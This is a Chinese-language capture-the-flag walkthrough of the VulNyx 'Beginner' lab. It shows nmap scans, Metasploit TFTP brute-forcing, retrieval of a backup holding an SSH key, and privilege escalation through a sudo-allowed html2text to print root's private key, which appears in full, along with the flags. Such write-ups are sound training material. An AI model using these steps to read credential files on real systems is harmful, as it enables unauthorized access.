Vlx_Beginner

靶机来源:https://vulnyx.com/

难度:Low

一、信息收集

1、主机探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-15 14:47 CST
Nmap scan report for 192.168.2.1
Host is up (0.00087s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00059s latency).
MAC Address: 08:00:27:89:E2:25 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.46
Host is up (0.00092s latency).
MAC Address: 08:00:27:1C:63:73 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.17 seconds

靶机IP:192.168.2.46

2、端口扫描

1.全端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.46                        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-15 14:47 CST
Nmap scan report for 192.168.2.46
Host is up (0.00050s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:1C:63:73 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 40.96 seconds

开放端口:22、80

2.详细信息扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.46 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-15 14:48 CST
Nmap scan report for 192.168.2.46
Host is up (0.00076s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:1C:63:73 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.81 seconds

3.udp扫描

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.46                    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-15 14:49 CST
Nmap scan report for 192.168.2.46
Host is up (0.0010s latency).
Not shown: 98 closed udp ports (port-unreach)
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
69/udp open|filtered tftp
MAC Address: 08:00:27:1C:63:73 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 115.40 seconds

开放着69端口

二、WEB渗透

1、80网站

访问80端口,提示我们具有敏感信息的文件 img

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(root㉿kali)-[/miaosec]
└─# gobuster dir -u http://192.168.2.46 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak,md,db,js
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.46
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              bak,md,db,js,php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 277]
/.php                 (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 120]
/.html                (Status: 403) [Size: 277]
/.php                 (Status: 403) [Size: 277]
/server-status        (Status: 403) [Size: 277]
Progress: 982602 / 1764488 (55.69%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 983671 / 1764488 (55.75%)
===============================================================
Finished
===============================================================

没有发现东西

2、UDP69-TFTP

Trivial File Transfer Protocol (TFTP) 是一种简单的协议,使用 UDP 69 端口,允许在不需要身份验证的情况下进行文件传输。该协议在 RFC 1350 中被强调,其简单性意味着它缺乏关键的安全特性,导致在公共互联网中的使用有限。然而,TFTP 在大型内部网络中被广泛用于向设备(如 VoIP 电话)分发 配置文件ROM 镜像,因为它在这些特定场景中的效率很高。

💡TIP

1
https://book.hacktricks.wiki/zh/network-services-pentesting/69-udp-tftp.html

因为TFTP协议本身不提供目录列表功能(无 lsdir 命令),只能通过尝试猜测或使用专门工具(如Nmap的tftp-enum脚本)进行暴力破解

使用msf进行爆破

  1. 查找tftp brute
1
2
3
4
5
6
7
8
9
10
11
msf6 > search tftp brute

Matching Modules
================

   #  Name                              Disclosure Date  Rank    Check  Description
   -  ----                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/tftp/tftpbrute  .                normal  No     TFTP Brute Forcer


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/tftp/tftpbrute
  1. 使用auxiliary/scanner/tftp/tftpbrute
1
msf6 > use auxiliary/scanner/tftp/tftpbrute
  1. 设置目标IP
1
2
msf6 auxiliary(scanner/tftp/tftpbrute) > set RHOSTS 192.168.2.46
RHOSTS => 192.168.2.46
  1. RUN
1
2
3
4
5
msf6 auxiliary(scanner/tftp/tftpbrute) > run

[+] Found backup-config on 192.168.2.46
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

找到文件backup-config

进行下载

1
2
3
┌──(root㉿kali)-[/tmp]
└─# tftp 192.168.2.46
tftp> get backup-config

三、获取boris权限

查看文件属性,是一个压缩包文件

1
2
3
┌──(root㉿kali)-[/tmp]
└─# file backup-config                                                                                                                  
backup-config: Zip archive data, at least v1.0 to extract, compression method=store

解压后得到两个文件

1
2
3
4
5
6
7
┌──(root㉿kali)-[/tmp/backup]
└─# ls -la
总计 8
drwxr-xr-x 2 root root   80 2023年 7月24日 .
drwxr-xr-x 4 root root  100  1月15日 15:47 ..
-rw-r--r-- 1 root root 1675 2023年 7月24日 id_rsa
-rw-r--r-- 1 root root 3335 2023年 7月24日 sshd_config

sshd_config中找到用户名boris

1
2
3
....
Match User boris
    PasswordAuthentication no

进行SSH连接

1
2
3
4
5
6
7
8
9
┌──(root㉿kali)-[/tmp/miao/backup]
└─# chmod 600 id_rsa     

┌──(root㉿kali)-[/tmp/miao/backup]
└─# ssh boris@192.168.2.46 -i id_rsa 
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.46' (ED25519) to the list of known hosts.
boris@beginner:~$ id
uid=1000(boris) gid=1000(boris) grupos=1000(boris)

四、权限提升

查看sudo -l

1
2
3
4
5
6
boris@beginner:~$ sudo -l
Matching Defaults entries for boris on beginner:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User boris may run the following commands on beginner:
    (root) NOPASSWD: /usr/bin/html2text

直接进行读取私钥

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
boris@beginner:~$ sudo /usr/bin/html2text /root/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY----- MIIEogIBAAKCAQEAhNACeq9+AH6O1/b3OaUEEIa8/
EmrcLunt8ZJeMKV4fr6bzde
5Sn5HiykGnIduo4DWHsp1n1GQq7Xy+ZyCxZPFWcswb8LAT880KJp7TC69SqqRpSm
Ci7kMh8aahQ6GuhwFMX5eXyj+ThmGUhGNRwknrP058JhsO4w9lzIk/HStfUQZTem
qNKOPLvvgkNuB3LhOrwEbx3NIgeQmJbgEnL4Sl9FDLexThBSWOSln3fatJg39J3R
d12NPluhdk1cso5Y148YebAaqG82Th/OhHm6NhN3MVi/BXyY/MZ2nLbuFaBNVbAj
tFL+Zd5MV54YCH+fYxWUGkdiMG+LsJnydR8uxQIDAQABAoIBAHko9goMTOuQiSmV
4IXS93lIIeIaJu+KEgBCQUaMZYWpm4uYPNbcyqnvWanSjzJgWcb/XPSShmVQ8gbO
bR2WNYE2BYueiCCUGxvN/spmWThNutb2xt6lVoIvA77gQv3HLHCXBvcAcOprvCC2
YW4UBYhObU58cvig40Ps8wKcaniZCcVFKjjwvAGYVdAGm5BproRIvt2M4v9RBVsG
XfWOGI3EOyfJZwvx0dzoUUhe8YzAi3wDjda5/saKv0pKbJHGTkVLCYxlQ409FGq1
jSUAzJ+Wgo1h0IL6B5T5ZtLw2ElxMEf0aekCGOuQHX4J/Dfb3ZwBvawJdq5lAqoE
nZkKw2UCgYEA27q3iyPPAUtKbthTjPZzkngH/E0fbr6q1sbmhNmn00CYB7/snB5H
drSqyaOI+zZX7HZGxDOq/jvuCU/bKJ3xwfYw1TAwYBB7vwrwazQAhsMKReOWTves
Zebv+hQNq4hfL1hcF+azc7fOe3O8jaMS8W92sMpSWcUaGbzxcq1lq/cCgYEAmrxg
o1B0QhLCVXz62vgLubIw9Xm1cAY24lV8Z43QZeeghNQX9/ubOQAO9nbqedNolPwv
GBRI+5Y26mVobJvfQxt54sa3+uEd7AwHz6+gFhHfB0gu1oHQuDRKYV5CXriQPAE9 LEZsV/
82KgVWZVzstsF2G9r3p5Ou4VcU+11ptCMCgYAeGCSrWewwMS+wntBSri6G
EQqG88kqUdL0N6m66FSkCmTIKvEtMLh4+aWqmEtanMbODCUFGk6BI5Qmkllh5sAF
4MIvcLovbhKEx+rFxAmOa4gsqk8b4bArBMY5aiW1KKhgw6lZXK+XWcVeAyv/+iXO C4YmEI/
W27gHbmljW3xhYQKBgFMyN+93YZrpBS37zdEQDxXf9iz2LJS38qiM+B+h
g0xXVto0Q1LlKFdkbacc1wN7pL5+PUAAICGNaadrsNK8mDU3v7gryl4Mzg7NhSGo
tzVGlJkQuYZCNBvmmZtyl9Lf/0UUEXUNxFEn+lJrnkFPzkKREFT3zbJ/WEb2kGR6
nEvrAoGAGwRoisMbU9E4lIibq/JD/i22u5VenuvEqJs8H/cv49DsVdYYBV4rOi/
u RWRA98sN8yc06jFezYYNw4RMk2Nfgeqd3pnNVVHRq9uBOsiOknVVFOOHsMi6IExx
AgMuIviN7GZ1VDlPDbaYw1+8keJq4eeYRkjLpxcMDBJJwNQ8h6c= -----END RSA PRIVATE KEY--
---

处理一下私钥

1
2
-----BEGIN RSA PRIVATE KEY----- MIIEogIBAAKCAQEAhNACeq9+AH6O1/b3OaUEEIa8/EmrcLunt8ZJeMKV4fr6bzde 5Sn5HiykGnIduo4DWHsp1n1GQq7Xy+ZyCxZPFWcswb8LAT880KJp7TC69SqqRpSm Ci7kMh8aahQ6GuhwFMX5eXyj+ThmGUhGNRwknrP058JhsO4w9lzIk/HStfUQZTem qNKOPLvvgkNuB3LhOrwEbx3NIgeQmJbgEnL4Sl9FDLexThBSWOSln3fatJg39J3R d12NPluhdk1cso5Y148YebAaqG82Th/OhHm6NhN3MVi/BXyY/MZ2nLbuFaBNVbAj tFL+Zd5MV54YCH+fYxWUGkdiMG+LsJnydR8uxQIDAQABAoIBAHko9goMTOuQiSmV 4IXS93lIIeIaJu+KEgBCQUaMZYWpm4uYPNbcyqnvWanSjzJgWcb/XPSShmVQ8gbO bR2WNYE2BYueiCCUGxvN/spmWThNutb2xt6lVoIvA77gQv3HLHCXBvcAcOprvCC2 YW4UBYhObU58cvig40Ps8wKcaniZCcVFKjjwvAGYVdAGm5BproRIvt2M4v9RBVsG XfWOGI3EOyfJZwvx0dzoUUhe8YzAi3wDjda5/saKv0pKbJHGTkVLCYxlQ409FGq1 jSUAzJ+Wgo1h0IL6B5T5ZtLw2ElxMEf0aekCGOuQHX4J/Dfb3ZwBvawJdq5lAqoE nZkKw2UCgYEA27q3iyPPAUtKbthTjPZzkngH/E0fbr6q1sbmhNmn00CYB7/snB5H drSqyaOI+zZX7HZGxDOq/jvuCU/bKJ3xwfYw1TAwYBB7vwrwazQAhsMKReOWTves Zebv+hQNq4hfL1hcF+azc7fOe3O8jaMS8W92sMpSWcUaGbzxcq1lq/cCgYEAmrxg o1B0QhLCVXz62vgLubIw9Xm1cAY24lV8Z43QZeeghNQX9/ubOQAO9nbqedNolPwv GBRI+5Y26mVobJvfQxt54sa3+uEd7AwHz6+gFhHfB0gu1oHQuDRKYV5CXriQPAE9 LEZsV/82KgVWZVzstsF2G9r3p5Ou4VcU+11ptCMCgYAeGCSrWewwMS+wntBSri6G EQqG88kqUdL0N6m66FSkCmTIKvEtMLh4+aWqmEtanMbODCUFGk6BI5Qmkllh5sAF 4MIvcLovbhKEx+rFxAmOa4gsqk8b4bArBMY5aiW1KKhgw6lZXK+XWcVeAyv/+iXO C4YmEI/W27gHbmljW3xhYQKBgFMyN+93YZrpBS37zdEQDxXf9iz2LJS38qiM+B+h g0xXVto0Q1LlKFdkbacc1wN7pL5+PUAAICGNaadrsNK8mDU3v7gryl4Mzg7NhSGo tzVGlJkQuYZCNBvmmZtyl9Lf/0UUEXUNxFEn+lJrnkFPzkKREFT3zbJ/WEb2kGR6 nEvrAoGAGwRoisMbU9E4lIibq/JD/i22u5VenuvEqJs8H/cv49DsVdYYBV4rOi/u RWRA98sN8yc06jFezYYNw4RMk2Nfgeqd3pnNVVHRq9uBOsiOknVVFOOHsMi6IExx AgMuIviN7GZ1VDlPDbaYw1+8keJq4eeYRkjLpxcMDBJJwNQ8h6c= 
-----END RSA PRIVATE KEY-----

获取root权限

1
2
3
4
┌──(root㉿kali)-[/tmp]
└─# ssh root@192.168.2.46 -i id_rsa 
root@beginner:~# id
uid=0(root) gid=0(root) grupos=0(root)

五、查看FLAG

1
2
3
root@beginner:~# cat /root/r000000000000000000000000000000t.txt /home/boris/user.txt 
16bd055a9f14c19d865ebfdcaa22298b
1c539f920aa59947f4ffa073cffdc370
Vulnyx
#Udp69-Tftp #msf #Sudo_html2text
Vlx_Beginner
http://miao-sec.github.io/Vulnyx/Vlx_Beginner/
作者
Miao
发布于
2026年1月15日
许可协议
BY-MIAO